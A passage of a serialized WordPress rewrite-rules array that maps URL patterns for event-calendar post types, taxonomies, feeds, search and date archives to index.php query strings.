[^/]+/([^/]+)/cancel(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&cancel=$matches[3]\";s:63:\"responsive_accordion/[^/]+/attachment/([^/]+)/cancel(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&cancel=$matches[3]\";s:60:\"responsive_accordion/[^/]+/([^/]+)/gateway-cancel(/(.*))?/?$\";s:59:\"index.php?attachment=$matches[1]&gateway-cancel=$matches[3]\";s:71:\"responsive_accordion/[^/]+/attachment/([^/]+)/gateway-cancel(/(.*))?/?$\";s:59:\"index.php?attachment=$matches[1]&gateway-cancel=$matches[3]\";s:60:\"responsive_accordion/[^/]+/([^/]+)/gateway-return(/(.*))?/?$\";s:59:\"index.php?attachment=$matches[1]&gateway-return=$matches[3]\";s:71:\"responsive_accordion/[^/]+/attachment/([^/]+)/gateway-return(/(.*))?/?$\";s:59:\"index.php?attachment=$matches[1]&gateway-return=$matches[3]\";s:45:\"responsive_accordion/([^/]+)(?:/([0-9]+))?/?$\";s:59:\"index.php?responsive_accordion=$matches[1]&page=$matches[2]\";s:37:\"responsive_accordion/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:47:\"responsive_accordion/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:67:\"responsive_accordion/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:62:\"responsive_accordion/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:62:\"responsive_accordion/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:43:\"responsive_accordion/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:34:\"nf_sub/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:44:\"nf_sub/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:64:\"nf_sub/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:59:\"nf_sub/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:59:\"nf_sub/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:40:\"nf_sub/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:23:\"nf_sub/([^/]+)/embed/?$\";s:39:\"index.php?nf_sub=$matches[1]&embed=true\";s:27:\"nf_sub/([^/]+)/trackback/?$\";s:33:\"index.php?nf_sub=$matches[1]&tb=1\";s:35:\"nf_sub/([^/]+)/page/?([0-9]{1,})/?$\";s:46:\"index.php?nf_sub=$matches[1]&paged=$matches[2]\";s:42:\"nf_sub/([^/]+)/comment-page-([0-9]{1,})/?$\";s:46:\"index.php?nf_sub=$matches[1]&cpage=$matches[2]\";s:32:\"nf_sub/([^/]+)/verify(/(.*))?/?$\";s:47:\"index.php?nf_sub=$matches[1]&verify=$matches[3]\";s:32:\"nf_sub/([^/]+)/cancel(/(.*))?/?$\";s:47:\"index.php?nf_sub=$matches[1]&cancel=$matches[3]\";s:40:\"nf_sub/([^/]+)/gateway-cancel(/(.*))?/?$\";s:55:\"index.php?nf_sub=$matches[1]&gateway-cancel=$matches[3]\";s:40:\"nf_sub/([^/]+)/gateway-return(/(.*))?/?$\";s:55:\"index.php?nf_sub=$matches[1]&gateway-return=$matches[3]\";s:38:\"nf_sub/[^/]+/([^/]+)/verify(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&verify=$matches[3]\";s:49:\"nf_sub/[^/]+/attachment/([^/]+)/verify(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&verify=$matches[3]\";s:38:\"nf_sub/[^/]+/([^/]+)/cancel(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&cancel=$matches[3]\";s:49:\"nf_sub/[^/]+/attachment/([^/]+)/cancel(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&cancel=$matches[3]\";s:46:\"nf_sub/[^/]+/([^/]+)/gateway-cancel(/(.*))?/?$\";s:59:\"index.php?attachment=$matches[1]&gateway-cancel=$matches[3]\";s:57:\"nf_sub/[^/]+/attachment/([^/]+)/gateway-cancel(/(.*))?/?$\";s:59:\"index.php?attachment=$matches[1]&gateway-cancel=$matches[3]\";s:46:\"nf_sub/[^/]+/([^/]+)/gateway-return(/(.*))?/?$\";s:59:\"index.php?attachment=$matches[1]&gateway-return=$matches[3]\";s:57:\"nf_sub/[^/]+/attachment/([^/]+)/gateway-return(/(.*))?/?$\";s:59:\"index.php?attachment=$matches[1]&gateway-return=$matches[3]\";s:31:\"nf_sub/([^/]+)(?:/([0-9]+))?/?$\";s:45:\"index.php?nf_sub=$matches[1]&page=$matches[2]\";s:23:\"nf_sub/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:33:\"nf_sub/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:53:\"nf_sub/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:48:\"nf_sub/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:48:\"nf_sub/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:29:\"nf_sub/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:37:\"mec-books/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:47:\"mec-books/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:67:\"mec-books/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:62:\"mec-books/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:62:\"mec-books/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:43:\"mec-books/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:26:\"mec-books/([^/]+)/embed/?$\";s:42:\"index.php?mec-books=$matches[1]&embed=true\";s:30:\"mec-books/([^/]+)/trackback/?$\";s:36:\"index.php?mec-books=$matches[1]&tb=1\";s:38:\"mec-books/([^/]+)/page/?([0-9]{1,})/?$\";s:49:\"index.php?mec-books=$matches[1]&paged=$matches[2]\";s:45:\"mec-books/([^/]+)/comment-page-([0-9]{1,})/?$\";s:49:\"index.php?mec-books=$matches[1]&cpage=$matches[2]\";s:35:\"mec-books/([^/]+)/verify(/(.*))?/?$\";s:50:\"index.php?mec-books=$matches[1]&verify=$matches[3]\";s:35:\"mec-books/([^/]+)/cancel(/(.*))?/?$\";s:50:\"index.php?mec-books=$matches[1]&cancel=$matches[3]\";s:43:\"mec-books/([^/]+)/gateway-cancel(/(.*))?/?$\";s:58:\"index.php?mec-books=$matches[1]&gateway-cancel=$matches[3]\";s:43:\"mec-books/([^/]+)/gateway-return(/(.*))?/?$\";s:58:\"index.php?mec-books=$matches[1]&gateway-return=$matches[3]\";s:41:\"mec-books/[^/]+/([^/]+)/verify(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&verify=$matches[3]\";s:52:\"mec-books/[^/]+/attachment/([^/]+)/verify(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&verify=$matches[3]\";s:41:\"mec-books/[^/]+/([^/]+)/cancel(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&cancel=$matches[3]\";s:52:\"mec-books/[^/]+/attachment/([^/]+)/cancel(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&cancel=$matches[3]\";s:49:\"mec-books/[^/]+/([^/]+)/gateway-cancel(/(.*))?/?$\";s:59:\"index.php?attachment=$matches[1]&gateway-cancel=$matches[3]\";s:60:\"mec-books/[^/]+/attachment/([^/]+)/gateway-cancel(/(.*))?/?$\";s:59:\"index.php?attachment=$matches[1]&gateway-cancel=$matches[3]\";s:49:\"mec-books/[^/]+/([^/]+)/gateway-return(/(.*))?/?$\";s:59:\"index.php?attachment=$matches[1]&gateway-return=$matches[3]\";s:60:\"mec-books/[^/]+/attachment/([^/]+)/gateway-return(/(.*))?/?$\";s:59:\"index.php?attachment=$matches[1]&gateway-return=$matches[3]\";s:34:\"mec-books/([^/]+)(?:/([0-9]+))?/?$\";s:48:\"index.php?mec-books=$matches[1]&page=$matches[2]\";s:26:\"mec-books/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:36:\"mec-books/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:56:\"mec-books/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:51:\"mec-books/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:51:\"mec-books/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:32:\"mec-books/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:34:\"events/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:44:\"events/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:64:\"events/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:59:\"events/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:59:\"events/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:40:\"events/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:23:\"events/([^/]+)/embed/?$\";s:43:\"index.php?mec-events=$matches[1]&embed=true\";s:27:\"events/([^/]+)/trackback/?$\";s:37:\"index.php?mec-events=$matches[1]&tb=1\";s:47:\"events/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?mec-events=$matches[1]&feed=$matches[2]\";s:42:\"events/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?mec-events=$matches[1]&feed=$matches[2]\";s:35:\"events/([^/]+)/page/?([0-9]{1,})/?$\";s:50:\"index.php?mec-events=$matches[1]&paged=$matches[2]\";s:42:\"events/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?mec-events=$matches[1]&cpage=$matches[2]\";s:32:\"events/([^/]+)/verify(/(.*))?/?$\";s:51:\"index.php?mec-events=$matches[1]&verify=$matches[3]\";s:32:\"events/([^/]+)/cancel(/(.*))?/?$\";s:51:\"index.php?mec-events=$matches[1]&cancel=$matches[3]\";s:40:\"events/([^/]+)/gateway-cancel(/(.*))?/?$\";s:59:\"index.php?mec-events=$matches[1]&gateway-cancel=$matches[3]\";s:40:\"events/([^/]+)/gateway-return(/(.*))?/?$\";s:59:\"index.php?mec-events=$matches[1]&gateway-return=$matches[3]\";s:38:\"events/[^/]+/([^/]+)/verify(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&verify=$matches[3]\";s:49:\"events/[^/]+/attachment/([^/]+)/verify(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&verify=$matches[3]\";s:38:\"events/[^/]+/([^/]+)/cancel(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&cancel=$matches[3]\";s:49:\"events/[^/]+/attachment/([^/]+)/cancel(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&cancel=$matches[3]\";s:46:\"events/[^/]+/([^/]+)/gateway-cancel(/(.*))?/?$\";s:59:\"index.php?attachment=$matches[1]&gateway-cancel=$matches[3]\";s:57:\"events/[^/]+/attachment/([^/]+)/gateway-cancel(/(.*))?/?$\";s:59:\"index.php?attachment=$matches[1]&gateway-cancel=$matches[3]\";s:46:\"events/[^/]+/([^/]+)/gateway-return(/(.*))?/?$\";s:59:\"index.php?attachment=$matches[1]&gateway-return=$matches[3]\";s:57:\"events/[^/]+/attachment/([^/]+)/gateway-return(/(.*))?/?$\";s:59:\"index.php?attachment=$matches[1]&gateway-return=$matches[3]\";s:31:\"events/([^/]+)(?:/([0-9]+))?/?$\";s:49:\"index.php?mec-events=$matches[1]&page=$matches[2]\";s:23:\"events/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:33:\"events/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:53:\"events/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:48:\"events/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:48:\"events/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:29:\"events/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:53:\"mec-category/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:51:\"index.php?mec_category=$matches[1]&feed=$matches[2]\";s:48:\"mec-category/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:51:\"index.php?mec_category=$matches[1]&feed=$matches[2]\";s:29:\"mec-category/([^/]+)/embed/?$\";s:45:\"index.php?mec_category=$matches[1]&embed=true\";s:41:\"mec-category/([^/]+)/page/?([0-9]{1,})/?$\";s:52:\"index.php?mec_category=$matches[1]&paged=$matches[2]\";s:23:\"mec-category/([^/]+)/?$\";s:34:\"index.php?mec_category=$matches[1]\";s:41:\"mec_calendars/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:51:\"mec_calendars/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:71:\"mec_calendars/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:66:\"mec_calendars/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:66:\"mec_calendars/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:47:\"mec_calendars/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:30:\"mec_calendars/([^/]+)/embed/?$\";s:46:\"index.php?mec_calendars=$matches[1]&embed=true\";s:34:\"mec_calendars/([^/]+)/trackback/?$\";s:40:\"index.php?mec_calendars=$matches[1]&tb=1\";s:42:\"mec_calendars/([^/]+)/page/?([0-9]{1,})/?$\";s:53:\"index.php?mec_calendars=$matches[1]&paged=$matches[2]\";s:49:\"mec_calendars/([^/]+)/comment-page-([0-9]{1,})/?$\";s:53:\"index.php?mec_calendars=$matches[1]&cpage=$matches[2]\";s:39:\"mec_calendars/([^/]+)/verify(/(.*))?/?$\";s:54:\"index.php?mec_calendars=$matches[1]&verify=$matches[3]\";s:39:\"mec_calendars/([^/]+)/cancel(/(.*))?/?$\";s:54:\"index.php?mec_calendars=$matches[1]&cancel=$matches[3]\";s:47:\"mec_calendars/([^/]+)/gateway-cancel(/(.*))?/?$\";s:62:\"index.php?mec_calendars=$matches[1]&gateway-cancel=$matches[3]\";s:47:\"mec_calendars/([^/]+)/gateway-return(/(.*))?/?$\";s:62:\"index.php?mec_calendars=$matches[1]&gateway-return=$matches[3]\";s:45:\"mec_calendars/[^/]+/([^/]+)/verify(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&verify=$matches[3]\";s:56:\"mec_calendars/[^/]+/attachment/([^/]+)/verify(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&verify=$matches[3]\";s:45:\"mec_calendars/[^/]+/([^/]+)/cancel(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&cancel=$matches[3]\";s:56:\"mec_calendars/[^/]+/attachment/([^/]+)/cancel(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&cancel=$matches[3]\";s:53:\"mec_calendars/[^/]+/([^/]+)/gateway-cancel(/(.*))?/?$\";s:59:\"index.php?attachment=$matches[1]&gateway-cancel=$matches[3]\";s:64:\"mec_calendars/[^/]+/attachment/([^/]+)/gateway-cancel(/(.*))?/?$\";s:59:\"index.php?attachment=$matches[1]&gateway-cancel=$matches[3]\";s:53:\"mec_calendars/[^/]+/([^/]+)/gateway-return(/(.*))?/?$\";s:59:\"index.php?attachment=$matches[1]&gateway-return=$matches[3]\";s:64:\"mec_calendars/[^/]+/attachment/([^/]+)/gateway-return(/(.*))?/?$\";s:59:\"index.php?attachment=$matches[1]&gateway-return=$matches[3]\";s:38:\"mec_calendars/([^/]+)(?:/([0-9]+))?/?$\";s:52:\"index.php?mec_calendars=$matches[1]&page=$matches[2]\";s:30:\"mec_calendars/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:40:\"mec_calendars/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:60:\"mec_calendars/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:55:\"mec_calendars/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:55:\"mec_calendars/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:36:\"mec_calendars/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:55:\"bg-block-types/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?bg_block_type=$matches[1]&feed=$matches[2]\";s:50:\"bg-block-types/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?bg_block_type=$matches[1]&feed=$matches[2]\";s:31:\"bg-block-types/([^/]+)/embed/?$\";s:46:\"index.php?bg_block_type=$matches[1]&embed=true\";s:43:\"bg-block-types/([^/]+)/page/?([0-9]{1,})/?$\";s:53:\"index.php?bg_block_type=$matches[1]&paged=$matches[2]\";s:25:\"bg-block-types/([^/]+)/?$\";s:35:\"index.php?bg_block_type=$matches[1]\";s:36:\"bg-block/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:46:\"bg-block/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:66:\"bg-block/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:61:\"bg-block/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:61:\"bg-block/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:42:\"bg-block/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:25:\"bg-block/([^/]+)/embed/?$\";s:41:\"index.php?bg_block=$matches[1]&embed=true\";s:29:\"bg-block/([^/]+)/trackback/?$\";s:35:\"index.php?bg_block=$matches[1]&tb=1\";s:37:\"bg-block/([^/]+)/page/?([0-9]{1,})/?$\";s:48:\"index.php?bg_block=$matches[1]&paged=$matches[2]\";s:44:\"bg-block/([^/]+)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?bg_block=$matches[1]&cpage=$matches[2]\";s:34:\"bg-block/([^/]+)/verify(/(.*))?/?$\";s:49:\"index.php?bg_block=$matches[1]&verify=$matches[3]\";s:34:\"bg-block/([^/]+)/cancel(/(.*))?/?$\";s:49:\"index.php?bg_block=$matches[1]&cancel=$matches[3]\";s:42:\"bg-block/([^/]+)/gateway-cancel(/(.*))?/?$\";s:57:\"index.php?bg_block=$matches[1]&gateway-cancel=$matches[3]\";s:42:\"bg-block/([^/]+)/gateway-return(/(.*))?/?$\";s:57:\"index.php?bg_block=$matches[1]&gateway-return=$matches[3]\";s:40:\"bg-block/[^/]+/([^/]+)/verify(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&verify=$matches[3]\";s:51:\"bg-block/[^/]+/attachment/([^/]+)/verify(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&verify=$matches[3]\";s:40:\"bg-block/[^/]+/([^/]+)/cancel(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&cancel=$matches[3]\";s:51:\"bg-block/[^/]+/attachment/([^/]+)/cancel(/(.*))?/?$\";s:51:\"index.php?attachment=$matches[1]&cancel=$matches[3]\";s:48:\"bg-block/[^/]+/([^/]+)/gateway-cancel(/(.*))?/?$\";s:59:\"index.php?attachment=$matches[1]&gateway-cancel=$matches[3]\";s:59:\"bg-block/[^/]+/attachment/([^/]+)/gateway-cancel(/(.*))?/?$\";s:59:\"index.php?attachment=$matches[1]&gateway-cancel=$matches[3]\";s:48:\"bg-block/[^/]+/([^/]+)/gateway-return(/(.*))?/?$\";s:59:\"index.php?attachment=$matches[1]&gateway-return=$matches[3]\";s:59:\"bg-block/[^/]+/attachment/([^/]+)/gateway-return(/(.*))?/?$\";s:59:\"index.php?attachment=$matches[1]&gateway-return=$matches[3]\";s:33:\"bg-block/([^/]+)(?:/([0-9]+))?/?$\";s:47:\"index.php?bg_block=$matches[1]&page=$matches[2]\";s:25:\"bg-block/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:35:\"bg-block/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:55:\"bg-block/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:50:\"bg-block/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:50:\"bg-block/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:31:\"bg-block/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:53:\"events-label/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:48:\"index.php?mec_label=$matches[1]&feed=$matches[2]\";s:48:\"events-label/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:48:\"index.php?mec_label=$matches[1]&feed=$matches[2]\";s:29:\"events-label/([^/]+)/embed/?$\";s:42:\"index.php?mec_label=$matches[1]&embed=true\";s:41:\"events-label/([^/]+)/page/?([0-9]{1,})/?$\";s:49:\"index.php?mec_label=$matches[1]&paged=$matches[2]\";s:23:\"events-label/([^/]+)/?$\";s:31:\"index.php?mec_label=$matches[1]\";s:56:\"events-location/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:51:\"index.php?mec_location=$matches[1]&feed=$matches[2]\";s:51:\"events-location/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:51:\"index.php?mec_location=$matches[1]&feed=$matches[2]\";s:32:\"events-location/([^/]+)/embed/?$\";s:45:\"index.php?mec_location=$matches[1]&embed=true\";s:44:\"events-location/([^/]+)/page/?([0-9]{1,})/?$\";s:52:\"index.php?mec_location=$matches[1]&paged=$matches[2]\";s:26:\"events-location/([^/]+)/?$\";s:34:\"index.php?mec_location=$matches[1]\";s:57:\"events-organizer/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?mec_organizer=$matches[1]&feed=$matches[2]\";s:52:\"events-organizer/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?mec_organizer=$matches[1]&feed=$matches[2]\";s:33:\"events-organizer/([^/]+)/embed/?$\";s:46:\"index.php?mec_organizer=$matches[1]&embed=true\";s:45:\"events-organizer/([^/]+)/page/?([0-9]{1,})/?$\";s:53:\"index.php?mec_organizer=$matches[1]&paged=$matches[2]\";s:27:\"events-organizer/([^/]+)/?$\";s:35:\"index.php?mec_organizer=$matches[1]\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:13:\"favicon\\.ico$\";s:19:\"index.php?favicon=1\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:8:\"embed/?$\";s:21:\"index.php?&embed=true\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:27:\"comment-page-([0-9]{1,})/?$\";s:41:\"index.php?&page_id=7160&cpage=$matches[1]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:17:\"comments/embed/?$\";s:21:\"index.php?&embed=true\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:20:\"search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:23:\"author/([^/]+)/embed/?$\";s:44:\"index.php?author_name=$matches[1]&embed=true\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:45:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:54:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/verify(/(.*))?/?$\";s:82:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&verify=$matches[5]\";s:54:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/cancel(/(.*))?/?$\";s:82:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&cancel=$matches[5]\";s:62:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/gateway-cancel(/(.*))?/?$\";s:90:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&gateway-cancel=$matches[5]\";s:62:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/gateway-return(/(.*))?/?$\";s:90:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&gateway-return=$matches[5]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$